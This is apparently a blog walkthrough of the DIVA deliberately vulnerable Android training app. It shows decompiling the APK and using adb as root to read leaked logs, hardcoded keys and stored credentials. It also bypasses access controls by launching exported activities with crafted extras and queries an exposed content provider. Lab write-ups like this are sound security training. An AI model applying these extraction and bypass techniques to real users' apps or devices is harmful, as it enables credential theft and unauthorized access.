Let’s Hack Android: DIVA android

Requirements:

1. Santoku: https://santoku-linux.com/download/
2. Android VM: https://www.android-x86.org/
3. DIVA android: https://github.com/payatu/diva-android

Let’s start:

Android Studio Set-up

1. Because Android Studio on Santoku is super old. I have to uninstall it.

sudo apt purge android-studio

2. Clean install follow this guide

https://developer.android.com/studio/install

3. Create custom command “android-studio”

cd /home/santoku/
nano .bash_aliases

type this

alias android-studio='sudo bash /opt/android-studio/bin/studio.sh'

Reconfigure bashrc

. ~/.bashrc

Check alias

alias

Type command

android-studio

Compile Diva android and install

1. Open Diva android project

2. Failed, just follow IDE recommendations and google it until successfully build.

3. Build APK file

4. Here’s the output apk.

5. Install apk, open terminal

cd <apk path>

6. connect to android vm, and install apk

adb connect <ip>:5555

adb install app-debug.apk

7. In android vm, verify if app is installed

8. Open Diva

9. Allow permission

Reconnaissance

1. Dump the permissions

aapt dump permissions app-debug.apk

2. Extract apk file

cp app-debug.apk app-debug.zip
ls

3. Unzip

unzip app-debug.zip

4. View source code

dex2jar classes.dex
ls

jd-gui classes_dex2jar.jar

There’re a lot of activity classes in app’s package

5. View manifest file

apktool d app-debug.apk
ls
cd app-debug

Open AndroidManifest.xml
Normally, this file shows service, activity, permissions,…

Let’s start the tasks

1. Insecure Logging

Error

To view the log, type this command

adb logcat | grep "1234567"

Let’s view source code, select “LogActivity”

You can see that there’a logging function in the code

Developer should not leave logging function in the app.

2. Hardcoding Issues — part 1

Let’s view source code, select “็HardCodeActivity”

Type “vendorsecretkey”

Success!!!

3. Insecure Data Storage — part 1

Type some texts and save

Let’s view source code, select “็InsecureDataStorage1Activity”

It seems like the data is saved in Preference.

View find in device, and change user ass root

adb shell
su

App data is located in /data/data/

cd /data/data
ls

cd jakhar.aseem.diva
ls
cd shared_prefs
ls
cat jakhar.aseem.diva_preferences.xml

Here’s the credential.

4. Insecure Data Storage — part 2

Let’s view source code, select “็InsecureDataStorage2Activity”

It’s SQLite

adb shell
su
cd /data/data/jakhar.aseem.diva/databases
ls

cp divanotes.db /sdcard/
cp ids2 /sdcard/

exit to santoku

adb pull /sdcard/divanotes.db
adb pull /sdcard/ids2

install sqlitebrowser

sudo apt-get install sqlitebrowser

open “divanotes.db” and “ids2” with sqlitebrowser

Success!!! I found data in ids2.

5. Insecure Data Storage — part 3

Let’s view source code, select “็InsecureDataStorage3Activity”

Let’s explore

adb shell
cd /data/data/jakhar.aseem.diva
ls

cat <uinfo file>

6. Insecure Data Storage — part 4

Let’s view source code, select “็InsecureDataStorage4Activity”

With “getExternalStorageDirectory” and “.uinfo.txt”, so my guess the path is “/mnt/sdcard/.uinfo.txt”

Type the data

In santoku

adb shell
su
cd /mnt/sdcard
ls -la

cat .uinfo.txt

7. Input Validation Issues — part 1

Type some sql injection

8. Input Validation Issues — part 2

Let’s view source code. Without proper validation, webview’s loadUrl function and view local file.

Let’s test the app

Let’s view preferences file from #3

9. Access Control Issues — part 1

Let’s view source code, there’s an action “VIEW_CREDS”.

Let’s bypass it

View the manifest file, VIEW_CREDS is associated with APICredsActivity.

In terminal, let’s open APICredsActivity directly.

adb shell am start -n jakhar.aseem.diva/.APICredsActivity

10. Access Control Issues — part 2

Test its functionality.

Let’s view source code, there’s an action “VIEW_CREDS2”.

View the manifest file, VIEW_CREDS2 is associated with APICreds2Activity.

View APICredsACtivity code, it seems like there must be an extra value to verify what to display

In terminal, let’s open APICredsActivity directly without extra value.

adb shell am start -n jakhar.aseem.diva/.APICreds2Activity

I need to find the tag string of extra value, so I can input the data correctly.

In app-debug directory created by apktool, open “/res/values”

Open strings.xml

There’re a lot of strings, I need to guess which one is correct.

Because the code need boolean value, so I guess this “chk_pin” is the right one.

Try command with extra values

adb shell am start -n jakhar.aseem.diva/.APICreds2Activity --ez check_pin false

Success!!!

11. Access Control Issues — part 3

Let’s view source code

Open “AccessControl3Activity”

Open “AccessControl3NotesActivity”

Open “NotesProvider”, there’s a content path. I can use adb to view it.

Let’s try in the app.

Let’s read the content with adb.

adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes

12.Hardcoding Issues — part 2

App crashed, couldn’t proceed

13. Input Validation Issues — part 3

App crashed, couldn’t proceed